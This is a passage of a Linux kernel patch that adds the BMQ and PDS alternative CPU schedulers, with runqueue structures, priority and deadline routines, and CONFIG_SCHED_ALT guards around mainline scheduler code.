++struct rq;
++struct balance_callback {
++	struct balance_callback *next;
++	void (*func)(struct rq *rq);
++};
++
++/*
++ * This is the main, per-CPU runqueue data structure.
++ * This data should only be modified by the local cpu.
++ */
++struct rq {
++	/* runqueue lock: */
++	raw_spinlock_t lock;
++
++	struct task_struct __rcu *curr;
++	struct task_struct *idle, *stop, *skip;
++	struct mm_struct *prev_mm;
++
++	struct sched_queue	queue;
++#ifdef CONFIG_SCHED_PDS
++	u64			time_edge;
++#endif
++	unsigned long watermark;
++
++	/* switch count */
++	u64 nr_switches;
++
++	atomic_t nr_iowait;
++
++#ifdef CONFIG_SCHED_DEBUG
++	u64 last_seen_need_resched_ns;
++	int ticks_without_resched;
++#endif
++
++#ifdef CONFIG_MEMBARRIER
++	int membarrier_state;
++#endif
++
++#ifdef CONFIG_SMP
++	int cpu;		/* cpu of this runqueue */
++	bool online;
++
++	unsigned int		ttwu_pending;
++	unsigned char		nohz_idle_balance;
++	unsigned char		idle_balance;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	struct sched_avg	avg_irq;
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++	int active_balance;
++	struct cpu_stop_work	active_balance_work;
++#endif
++	struct balance_callback	*balance_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++	struct rcuwait		hotplug_wait;
++#endif
++	unsigned int		nr_pinned;
++
++#endif /* CONFIG_SMP */
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	u64 prev_irq_time;
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++#ifdef CONFIG_PARAVIRT
++	u64 prev_steal_time;
++#endif /* CONFIG_PARAVIRT */
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	u64 prev_steal_time_rq;
++#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
++
++	/* For genenal cpu load util */
++	s32 load_history;
++	u64 load_block;
++	u64 load_stamp;
++
++	/* calc_load related fields */
++	unsigned long calc_load_update;
++	long calc_load_active;
++
++	u64 clock, last_tick;
++	u64 last_ts_switch;
++	u64 clock_task;
++
++	unsigned int  nr_running;
++	unsigned long nr_uninterruptible;
++
++#ifdef CONFIG_SCHED_HRTICK
++#ifdef CONFIG_SMP
++	call_single_data_t hrtick_csd;
++#endif
++	struct hrtimer		hrtick_timer;
++	ktime_t			hrtick_time;
++#endif
++
++#ifdef CONFIG_SCHEDSTATS
++
++	/* latency stats */
++	struct sched_info rq_sched_info;
++	unsigned long long rq_cpu_time;
++	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
++
++	/* sys_sched_yield() stats */
++	unsigned int yld_count;
++
++	/* schedule() stats */
++	unsigned int sched_switch;
++	unsigned int sched_count;
++	unsigned int sched_goidle;
++
++	/* try_to_wake_up() stats */
++	unsigned int ttwu_count;
++	unsigned int ttwu_local;
++#endif /* CONFIG_SCHEDSTATS */
++
++#ifdef CONFIG_CPU_IDLE
++	/* Must be inspected within a rcu lock section */
++	struct cpuidle_state *idle_state;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++#ifdef CONFIG_SMP
++	call_single_data_t	nohz_csd;
++#endif
++	atomic_t		nohz_flags;
++#endif /* CONFIG_NO_HZ_COMMON */
++};
++
++extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
++
++extern unsigned long calc_load_update;
++extern atomic_long_t calc_load_tasks;
++
++extern void calc_global_load_tick(struct rq *this_rq);
++extern long calc_load_fold_active(struct rq *this_rq, long adjust);
++
++DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
++#define this_rq()		this_cpu_ptr(&runqueues)
++#define task_rq(p)		cpu_rq(task_cpu(p))
++#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
++#define raw_rq()		raw_cpu_ptr(&runqueues)
++
++#ifdef CONFIG_SMP
++#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
++void register_sched_domain_sysctl(void);
++void unregister_sched_domain_sysctl(void);
++#else
++static inline void register_sched_domain_sysctl(void)
++{
++}
++static inline void unregister_sched_domain_sysctl(void)
++{
++}
++#endif
++
++extern bool sched_smp_initialized;
++
++enum {
++	ITSELF_LEVEL_SPACE_HOLDER,
++#ifdef CONFIG_SCHED_SMT
++	SMT_LEVEL_SPACE_HOLDER,
++#endif
++	COREGROUP_LEVEL_SPACE_HOLDER,
++	CORE_LEVEL_SPACE_HOLDER,
++	OTHER_LEVEL_SPACE_HOLDER,
++	NR_CPU_AFFINITY_LEVELS
++};
++
++DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++
++static inline int
++__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
++{
++	int cpu;
++
++	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
++		mask++;
++
++	return cpu;
++}
++
++static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
++{
++	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
++}
++
++extern void flush_smp_call_function_queue(void);
++
++#else  /* !CONFIG_SMP */
++static inline void flush_smp_call_function_queue(void) { }
++#endif
++
++#ifndef arch_scale_freq_tick
++static __always_inline
++void arch_scale_freq_tick(void)
++{
++}
++#endif
++
++#ifndef arch_scale_freq_capacity
++static __always_inline
++unsigned long arch_scale_freq_capacity(int cpu)
++{
++	return SCHED_CAPACITY_SCALE;
++}
++#endif
++
++static inline u64 __rq_clock_broken(struct rq *rq)
++{
++	return READ_ONCE(rq->clock);
++}
++
++static inline u64 rq_clock(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock;
++}
++
++static inline u64 rq_clock_task(struct rq *rq)
++{
++	/*
++	 * Relax lockdep_assert_held() checking as in VRQ, call to
++	 * sched_info_xxxx() may not held rq->lock
++	 * lockdep_assert_held(&rq->lock);
++	 */
++	return rq->clock_task;
++}
++
++/*
++ * {de,en}queue flags:
++ *
++ * DEQUEUE_SLEEP  - task is no longer runnable
++ * ENQUEUE_WAKEUP - task just became runnable
++ *
++ */
++
++#define DEQUEUE_SLEEP		0x01
++
++#define ENQUEUE_WAKEUP		0x01
++
++
++/*
++ * Below are scheduler API which using in other kernel code
++ * It use the dummy rq_flags
++ * ToDo : BMQ need to support these APIs for compatibility with mainline
++ * scheduler code.
++ */
++struct rq_flags {
++	unsigned long flags;
++};
++
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock);
++
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock);
++
++static inline void __task_rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline void
++task_rq_unlock(struct rq *rq, struct task_struct *p, struct rq_flags *rf)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++}
++
++static inline void
++rq_lock(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock(&rq->lock);
++}
++
++static inline void
++rq_unlock_irq(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irq(&rq->lock);
++}
++
++static inline void
++rq_unlock(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock(&rq->lock);
++}
++
++static inline struct rq *
++this_rq_lock_irq(struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	local_irq_disable();
++	rq = this_rq();
++	raw_spin_lock(&rq->lock);
++
++	return rq;
++}
++
++static inline raw_spinlock_t *__rq_lockp(struct rq *rq)
++{
++	return &rq->lock;
++}
++
++static inline raw_spinlock_t *rq_lockp(struct rq *rq)
++{
++	return __rq_lockp(rq);
++}
++
++static inline void lockdep_assert_rq_held(struct rq *rq)
++{
++	lockdep_assert_held(__rq_lockp(rq));
++}
++
++extern void raw_spin_rq_lock_nested(struct rq *rq, int subclass);
++extern void raw_spin_rq_unlock(struct rq *rq);
++
++static inline void raw_spin_rq_lock(struct rq *rq)
++{
++	raw_spin_rq_lock_nested(rq, 0);
++}
++
++static inline void raw_spin_rq_lock_irq(struct rq *rq)
++{
++	local_irq_disable();
++	raw_spin_rq_lock(rq);
++}
++
++static inline void raw_spin_rq_unlock_irq(struct rq *rq)
++{
++	raw_spin_rq_unlock(rq);
++	local_irq_enable();
++}
++
++static inline int task_current(struct rq *rq, struct task_struct *p)
++{
++	return rq->curr == p;
++}
++
++static inline bool task_on_cpu(struct task_struct *p)
++{
++	return p->on_cpu;
++}
++
++extern int task_running_nice(struct task_struct *p);
++
++extern struct static_key_false sched_schedstats;
++
++#ifdef CONFIG_CPU_IDLE
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++	rq->idle_state = idle_state;
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	WARN_ON(!rcu_read_lock_held());
++	return rq->idle_state;
++}
++#else
++static inline void idle_set_state(struct rq *rq,
++				  struct cpuidle_state *idle_state)
++{
++}
++
++static inline struct cpuidle_state *idle_get_state(struct rq *rq)
++{
++	return NULL;
++}
++#endif
++
++static inline int cpu_of(const struct rq *rq)
++{
++#ifdef CONFIG_SMP
++	return rq->cpu;
++#else
++	return 0;
++#endif
++}
++
++#include "stats.h"
++
++#ifdef CONFIG_NO_HZ_COMMON
++#define NOHZ_BALANCE_KICK_BIT	0
++#define NOHZ_STATS_KICK_BIT	1
++
++#define NOHZ_BALANCE_KICK	BIT(NOHZ_BALANCE_KICK_BIT)
++#define NOHZ_STATS_KICK		BIT(NOHZ_STATS_KICK_BIT)
++
++#define NOHZ_KICK_MASK	(NOHZ_BALANCE_KICK | NOHZ_STATS_KICK)
++
++#define nohz_flags(cpu)	(&cpu_rq(cpu)->nohz_flags)
++
++/* TODO: needed?
++extern void nohz_balance_exit_idle(struct rq *rq);
++#else
++static inline void nohz_balance_exit_idle(struct rq *rq) { }
++*/
++#endif
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++struct irqtime {
++	u64			total;
++	u64			tick_delta;
++	u64			irq_start_time;
++	struct u64_stats_sync	sync;
++};
++
++DECLARE_PER_CPU(struct irqtime, cpu_irqtime);
++
++/*
++ * Returns the irqtime minus the softirq time computed by ksoftirqd.
++ * Otherwise ksoftirqd's sum_exec_runtime is substracted its own runtime
++ * and never move forward.
++ */
++static inline u64 irq_time_read(int cpu)
++{
++	struct irqtime *irqtime = &per_cpu(cpu_irqtime, cpu);
++	unsigned int seq;
++	u64 total;
++
++	do {
++		seq = __u64_stats_fetch_begin(&irqtime->sync);
++		total = irqtime->total;
++	} while (__u64_stats_fetch_retry(&irqtime->sync, seq));
++
++	return total;
++}
++#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
++
++#ifdef CONFIG_CPU_FREQ
++DECLARE_PER_CPU(struct update_util_data __rcu *, cpufreq_update_util_data);
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++extern int __init sched_tick_offload_init(void);
++#else
++static inline int sched_tick_offload_init(void) { return 0; }
++#endif
++
++#ifdef arch_scale_freq_capacity
++#ifndef arch_scale_freq_invariant
++#define arch_scale_freq_invariant()	(true)
++#endif
++#else /* arch_scale_freq_capacity */
++#define arch_scale_freq_invariant()	(false)
++#endif
++
++extern void schedule_idle(void);
++
++#define cap_scale(v, s) ((v)*(s) >> SCHED_CAPACITY_SHIFT)
++
++/*
++ * !! For sched_setattr_nocheck() (kernel) only !!
++ *
++ * This is actually gross. :(
++ *
++ * It is used to make schedutil kworker(s) higher priority than SCHED_DEADLINE
++ * tasks, but still be able to sleep. We need this on platforms that cannot
++ * atomically change clock frequency. Remove once fast switching will be
++ * available on such platforms.
++ *
++ * SUGOV stands for SchedUtil GOVernor.
++ */
++#define SCHED_FLAG_SUGOV	0x10000000
++
++#ifdef CONFIG_MEMBARRIER
++/*
++ * The scheduler provides memory barriers required by membarrier between:
++ * - prior user-space memory accesses and store to rq->membarrier_state,
++ * - store to rq->membarrier_state and following user-space memory accesses.
++ * In the same way it provides those guarantees around store to rq->curr.
++ */
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++	int membarrier_state;
++
++	if (prev_mm == next_mm)
++		return;
++
++	membarrier_state = atomic_read(&next_mm->membarrier_state);
++	if (READ_ONCE(rq->membarrier_state) == membarrier_state)
++		return;
++
++	WRITE_ONCE(rq->membarrier_state, membarrier_state);
++}
++#else
++static inline void membarrier_switch_mm(struct rq *rq,
++					struct mm_struct *prev_mm,
++					struct mm_struct *next_mm)
++{
++}
++#endif
++
++#ifdef CONFIG_NUMA
++extern int sched_numa_find_closest(const struct cpumask *cpus, int cpu);
++#else
++static inline int sched_numa_find_closest(const struct cpumask *cpus, int cpu)
++{
++	return nr_cpu_ids;
++}
++#endif
++
++extern void swake_up_all_locked(struct swait_queue_head *q);
++extern void __prepare_to_swait(struct swait_queue_head *q, struct swait_queue *wait);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++extern int preempt_dynamic_mode;
++extern int sched_dynamic_mode(const char *str);
++extern void sched_dynamic_update(int mode);
++#endif
++
++static inline void nohz_run_idle_balance(int cpu) { }
++
++static inline
++unsigned long uclamp_rq_util_with(struct rq *rq, unsigned long util,
++				  struct task_struct *p)
++{
++	return util;
++}
++
++static inline bool uclamp_rq_is_capped(struct rq *rq) { return false; }
++
++#endif /* ALT_SCHED_H */
+diff --git a/kernel/sched/bmq.h b/kernel/sched/bmq.h
+new file mode 100644
+index 000000000000..66b77291b9d0
+--- /dev/null
++++ b/kernel/sched/bmq.h
+@@ -0,0 +1,110 @@
++#define ALT_SCHED_VERSION_MSG "sched/bmq: BMQ CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++/*
++ * BMQ only routines
++ */
++#define rq_switch_time(rq)	((rq)->clock - (rq)->last_ts_switch)
++#define boost_threshold(p)	(sched_timeslice_ns >>\
++				 (15 - MAX_PRIORITY_ADJ -  (p)->boost_prio))
++
++static inline void boost_task(struct task_struct *p)
++{
++	int limit;
++
++	switch (p->policy) {
++	case SCHED_NORMAL:
++		limit = -MAX_PRIORITY_ADJ;
++		break;
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		limit = 0;
++		break;
++	default:
++		return;
++	}
++
++	if (p->boost_prio > limit)
++		p->boost_prio--;
++}
++
++static inline void deboost_task(struct task_struct *p)
++{
++	if (p->boost_prio < MAX_PRIORITY_ADJ)
++		p->boost_prio++;
++}
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms) {}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	return p->prio + p->boost_prio - MAX_RT_PRIO;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO)? p->prio : MAX_RT_PRIO / 2 + (p->prio + p->boost_prio) / 2;
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return task_sched_prio(p);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return prio;
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return idx;
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p)) {
++		if (SCHED_RR != p->policy)
++			deboost_task(p);
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++	}
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq) {}
++
++inline int task_running_nice(struct task_struct *p)
++{
++	return (p->prio + p->boost_prio > DEFAULT_PRIO + MAX_PRIORITY_ADJ);
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	p->boost_prio = MAX_PRIORITY_ADJ;
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p)
++{
++	if(this_rq()->clock_task - p->last_ran > sched_timeslice_ns)
++		boost_task(p);
++}
++#endif
++
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq)
++{
++	if (rq_switch_time(rq) < boost_threshold(p))
++		boost_task(p);
++}
++
++static inline void update_rq_time_edge(struct rq *rq) {}
+diff --git a/kernel/sched/build_policy.c b/kernel/sched/build_policy.c
+index d9dc9ab3773f..71a25540d65e 100644
+--- a/kernel/sched/build_policy.c
++++ b/kernel/sched/build_policy.c
+@@ -42,13 +42,19 @@
+ 
+ #include "idle.c"
+ 
++#ifndef CONFIG_SCHED_ALT
+ #include "rt.c"
++#endif
+ 
+ #ifdef CONFIG_SMP
++#ifndef CONFIG_SCHED_ALT
+ # include "cpudeadline.c"
++#endif
+ # include "pelt.c"
+ #endif
+ 
+ #include "cputime.c"
+-#include "deadline.c"
+ 
++#ifndef CONFIG_SCHED_ALT
++#include "deadline.c"
++#endif
+diff --git a/kernel/sched/build_utility.c b/kernel/sched/build_utility.c
+index 99bdd96f454f..23f80a86d2d7 100644
+--- a/kernel/sched/build_utility.c
++++ b/kernel/sched/build_utility.c
+@@ -85,7 +85,9 @@
+ 
+ #ifdef CONFIG_SMP
+ # include "cpupri.c"
++#ifndef CONFIG_SCHED_ALT
+ # include "stop_task.c"
++#endif
+ # include "topology.c"
+ #endif
+ 
+diff --git a/kernel/sched/cpufreq_schedutil.c b/kernel/sched/cpufreq_schedutil.c
+index 1207c78f85c1..68812e0756cb 100644
+--- a/kernel/sched/cpufreq_schedutil.c
++++ b/kernel/sched/cpufreq_schedutil.c
+@@ -159,9 +159,14 @@ static void sugov_get_util(struct sugov_cpu *sg_cpu)
+ 	struct rq *rq = cpu_rq(sg_cpu->cpu);
+ 
+ 	sg_cpu->max = arch_scale_cpu_capacity(sg_cpu->cpu);
++#ifndef CONFIG_SCHED_ALT
+ 	sg_cpu->bw_dl = cpu_bw_dl(rq);
+ 	sg_cpu->util = effective_cpu_util(sg_cpu->cpu, cpu_util_cfs(sg_cpu->cpu),
+ 					  FREQUENCY_UTIL, NULL);
++#else
++	sg_cpu->bw_dl = 0;
++	sg_cpu->util = rq_load_util(rq, sg_cpu->max);
++#endif /* CONFIG_SCHED_ALT */
+ }
+ 
+ /**
+@@ -305,8 +310,10 @@ static inline bool sugov_cpu_is_busy(struct sugov_cpu *sg_cpu) { return false; }
+  */
+ static inline void ignore_dl_rate_limit(struct sugov_cpu *sg_cpu)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	if (cpu_bw_dl(cpu_rq(sg_cpu->cpu)) > sg_cpu->bw_dl)
+ 		sg_cpu->sg_policy->limits_changed = true;
++#endif
+ }
+ 
+ static inline bool sugov_update_single_common(struct sugov_cpu *sg_cpu,
+@@ -606,6 +613,7 @@ static int sugov_kthread_create(struct sugov_policy *sg_policy)
+ 	}
+ 
+ 	ret = sched_setattr_nocheck(thread, &attr);
++
+ 	if (ret) {
+ 		kthread_stop(thread);
+ 		pr_warn("%s: failed to set SCHED_DEADLINE\n", __func__);
+@@ -838,7 +846,9 @@ cpufreq_governor_init(schedutil_gov);
+ #ifdef CONFIG_ENERGY_MODEL
+ static void rebuild_sd_workfn(struct work_struct *work)
+ {
++#ifndef CONFIG_SCHED_ALT
+ 	rebuild_sched_domains_energy();
++#endif /* CONFIG_SCHED_ALT */
+ }
+ static DECLARE_WORK(rebuild_sd_work, rebuild_sd_workfn);
+ 
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc77853743..b48b3f9ed47f 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -122,7 +122,7 @@ void account_user_time(struct task_struct *p, u64 cputime)
+ 	p->utime += cputime;
+ 	account_group_user_time(p, cputime);
+ 
+-	index = (task_nice(p) > 0) ? CPUTIME_NICE : CPUTIME_USER;
++	index = task_running_nice(p) ? CPUTIME_NICE : CPUTIME_USER;
+ 
+ 	/* Add user time to cpustat. */
+ 	task_group_account_field(p, index, cputime);
+@@ -146,7 +146,7 @@ void account_guest_time(struct task_struct *p, u64 cputime)
+ 	p->gtime += cputime;
+ 
+ 	/* Add guest time to cpustat. */
+-	if (task_nice(p) > 0) {
++	if (task_running_nice(p)) {
+ 		task_group_account_field(p, CPUTIME_NICE, cputime);
+ 		cpustat[CPUTIME_GUEST_NICE] += cputime;
+ 	} else {
+@@ -284,7 +284,7 @@ static inline u64 account_other_time(u64 max)
+ #ifdef CONFIG_64BIT
+ static inline u64 read_sum_exec_runtime(struct task_struct *t)
+ {
+-	return t->se.sum_exec_runtime;
++	return tsk_seruntime(t);
+ }
+ #else
+ static u64 read_sum_exec_runtime(struct task_struct *t)
+@@ -294,7 +294,7 @@ static u64 read_sum_exec_runtime(struct task_struct *t)
+ 	struct rq *rq;
+ 
+ 	rq = task_rq_lock(t, &rf);
+-	ns = t->se.sum_exec_runtime;
++	ns = tsk_seruntime(t);
+ 	task_rq_unlock(rq, t, &rf);
+ 
+ 	return ns;
+@@ -626,7 +626,7 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ void task_cputime_adjusted(struct task_struct *p, u64 *ut, u64 *st)
+ {
+ 	struct task_cputime cputime = {
+-		.sum_exec_runtime = p->se.sum_exec_runtime,
++		.sum_exec_runtime = tsk_seruntime(p),
+ 	};
+ 
+ 	if (task_cputime(p, &cputime.utime, &cputime.stime))
+diff --git a/kernel/sched/debug.c b/kernel/sched/debug.c
+index 1637b65ba07a..033c6deeb515 100644
+--- a/kernel/sched/debug.c
++++ b/kernel/sched/debug.c
+@@ -7,6 +7,7 @@
+  * Copyright(C) 2007, Red Hat, Inc., Ingo Molnar
+  */
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * This allows printing both to /proc/sched_debug and
+  * to the console
+@@ -215,6 +216,7 @@ static const struct file_operations sched_scaling_fops = {
+ };
+ 
+ #endif /* SMP */
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 
+@@ -278,6 +280,7 @@ static const struct file_operations sched_dynamic_fops = {
+ 
+ #endif /* CONFIG_PREEMPT_DYNAMIC */
+ 
++#ifndef CONFIG_SCHED_ALT
+ __read_mostly bool sched_debug_verbose;
+ 
+ static const struct seq_operations sched_debug_sops;
+@@ -293,6 +296,7 @@ static const struct file_operations sched_debug_fops = {
+ 	.llseek		= seq_lseek,
+ 	.release	= seq_release,
+ };
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ static struct dentry *debugfs_sched;
+ 
+@@ -302,12 +306,15 @@ static __init int sched_init_debug(void)
+ 
+ 	debugfs_sched = debugfs_create_dir("sched", NULL);
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_file("features", 0644, debugfs_sched, NULL, &sched_feat_fops);
+ 	debugfs_create_bool("verbose", 0644, debugfs_sched, &sched_debug_verbose);
++#endif /* !CONFIG_SCHED_ALT */
+ #ifdef CONFIG_PREEMPT_DYNAMIC
+ 	debugfs_create_file("preempt", 0644, debugfs_sched, NULL, &sched_dynamic_fops);
+ #endif
+ 
++#ifndef CONFIG_SCHED_ALT
+ 	debugfs_create_u32("latency_ns", 0644, debugfs_sched, &sysctl_sched_latency);
+ 	debugfs_create_u32("min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_min_granularity);
+ 	debugfs_create_u32("idle_min_granularity_ns", 0644, debugfs_sched, &sysctl_sched_idle_min_granularity);
+@@ -337,11 +344,13 @@ static __init int sched_init_debug(void)
+ #endif
+ 
+ 	debugfs_create_file("debug", 0444, debugfs_sched, NULL, &sched_debug_fops);
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ 	return 0;
+ }
+ late_initcall(sched_init_debug);
+ 
++#ifndef CONFIG_SCHED_ALT
+ #ifdef CONFIG_SMP
+ 
+ static cpumask_var_t		sd_sysctl_cpus;
+@@ -1068,6 +1077,7 @@ void proc_sched_set_task(struct task_struct *p)
+ 	memset(&p->stats, 0, sizeof(p->stats));
+ #endif
+ }
++#endif /* !CONFIG_SCHED_ALT */
+ 
+ void resched_latency_warn(int cpu, u64 latency)
+ {
+diff --git a/kernel/sched/idle.c b/kernel/sched/idle.c
+index f26ab2675f7d..480d4ad16d45 100644
+--- a/kernel/sched/idle.c
++++ b/kernel/sched/idle.c
+@@ -400,6 +400,7 @@ void cpu_startup_entry(enum cpuhp_state state)
+ 		do_idle();
+ }
+ 
++#ifndef CONFIG_SCHED_ALT
+ /*
+  * idle-task scheduling class.
+  */
+@@ -521,3 +522,4 @@ DEFINE_SCHED_CLASS(idle) = {
+ 	.switched_to		= switched_to_idle,
+ 	.update_curr		= update_curr_idle,
+ };
++#endif
+diff --git a/kernel/sched/pds.h b/kernel/sched/pds.h
+new file mode 100644
+index 000000000000..56a649d02e49
+--- /dev/null
++++ b/kernel/sched/pds.h
+@@ -0,0 +1,127 @@
++#define ALT_SCHED_VERSION_MSG "sched/pds: PDS CPU Scheduler "ALT_SCHED_VERSION" by Alfred Chen.\n"
++
++static int sched_timeslice_shift = 22;
++
++#define NORMAL_PRIO_MOD(x)	((x) & (NORMAL_PRIO_NUM - 1))
++
++/*
++ * Common interfaces
++ */
++static inline void sched_timeslice_imp(const int timeslice_ms)
++{
++	if (2 == timeslice_ms)
++		sched_timeslice_shift = 21;
++}
++
++static inline int
++task_sched_prio_normal(const struct task_struct *p, const struct rq *rq)
++{
++	s64 delta = p->deadline - rq->time_edge + NORMAL_PRIO_NUM - NICE_WIDTH;
++
++	if (WARN_ONCE(delta > NORMAL_PRIO_NUM - 1,
++		      "pds: task_sched_prio_normal() delta %lld\n", delta))
++		return NORMAL_PRIO_NUM - 1;
++
++	return (delta < 0) ? 0 : delta;
++}
++
++static inline int task_sched_prio(const struct task_struct *p)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio :
++		MIN_NORMAL_PRIO + task_sched_prio_normal(p, task_rq(p));
++}
++
++static inline int
++task_sched_prio_idx(const struct task_struct *p, const struct rq *rq)
++{
++	return (p->prio < MAX_RT_PRIO) ? p->prio : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD(task_sched_prio_normal(p, rq) + rq->time_edge);
++}
++
++static inline int sched_prio2idx(int prio, struct rq *rq)
++{
++	return (IDLE_TASK_SCHED_PRIO == prio || prio < MAX_RT_PRIO) ? prio :
++		MIN_NORMAL_PRIO + NORMAL_PRIO_MOD((prio - MIN_NORMAL_PRIO) +
++						  rq->time_edge);
++}
++
++static inline int sched_idx2prio(int idx, struct rq *rq)
++{
++	return (idx < MAX_RT_PRIO) ? idx : MIN_NORMAL_PRIO +
++		NORMAL_PRIO_MOD((idx - MIN_NORMAL_PRIO) + NORMAL_PRIO_NUM -
++				NORMAL_PRIO_MOD(rq->time_edge));
++}
++
++static inline void sched_renew_deadline(struct task_struct *p, const struct rq *rq)
++{
++	if (p->prio >= MAX_RT_PRIO)
++		p->deadline = (rq->clock >> sched_timeslice_shift) +
++			p->static_prio - (MAX_PRIO - NICE_WIDTH);
++}
++
++int task_running_nice(struct task_struct *p)
++{
++	return (p->prio > DEFAULT_PRIO);
++}
++
++static inline void update_rq_time_edge(struct rq *rq)
++{
++	struct list_head head;
++	u64 old = rq->time_edge;
++	u64 now = rq->clock >> sched_timeslice_shift;
++	u64 prio, delta;
++
++	if (now == old)
++		return;
++
++	delta = min_t(u64, NORMAL_PRIO_NUM, now - old);
++	INIT_LIST_HEAD(&head);
++
++	for_each_set_bit(prio, &rq->queue.bitmap[2], delta)
++		list_splice_tail_init(rq->queue.heads + MIN_NORMAL_PRIO +
++				      NORMAL_PRIO_MOD(prio + old), &head);
++
++	rq->queue.bitmap[2] = (NORMAL_PRIO_NUM == delta) ? 0UL :
++		rq->queue.bitmap[2] >> delta;
++	rq->time_edge = now;
++	if (!list_empty(&head)) {
++		u64 idx = MIN_NORMAL_PRIO + NORMAL_PRIO_MOD(now);
++		struct task_struct *p;
++
++		list_for_each_entry(p, &head, sq_node)
++			p->sq_idx = idx;
++
++		list_splice(&head, rq->queue.heads + idx);
++		rq->queue.bitmap[2] |= 1UL;
++	}
++}
++
++static inline void time_slice_expired(struct task_struct *p, struct rq *rq)
++{
++	p->time_slice = sched_timeslice_ns;
++	sched_renew_deadline(p, rq);
++	if (SCHED_FIFO != p->policy && task_on_rq_queued(p))
++		requeue_task(p, rq, task_sched_prio_idx(p, rq));
++}
++
++static inline void sched_task_sanity_check(struct task_struct *p, struct rq *rq)
++{
++	u64 max_dl = rq->time_edge + NICE_WIDTH - 1;
++	if (unlikely(p->deadline > max_dl))
++		p->deadline = max_dl;
++}
++
++static void sched_task_fork(struct task_struct *p, struct rq *rq)
++{
++	sched_renew_deadline(p, rq);
++}
++
++static inline void do_sched_yield_type_1(struct task_struct *p, struct rq *rq)
++{
++	time_slice_expired(p, rq);
++}
++
++#ifdef CONFIG_SMP
++static inline void sched_task_ttwu(struct task_struct *p) {}
++#endif
++static inline void sched_task_deactivate(struct task_struct *p, struct rq *rq) {}
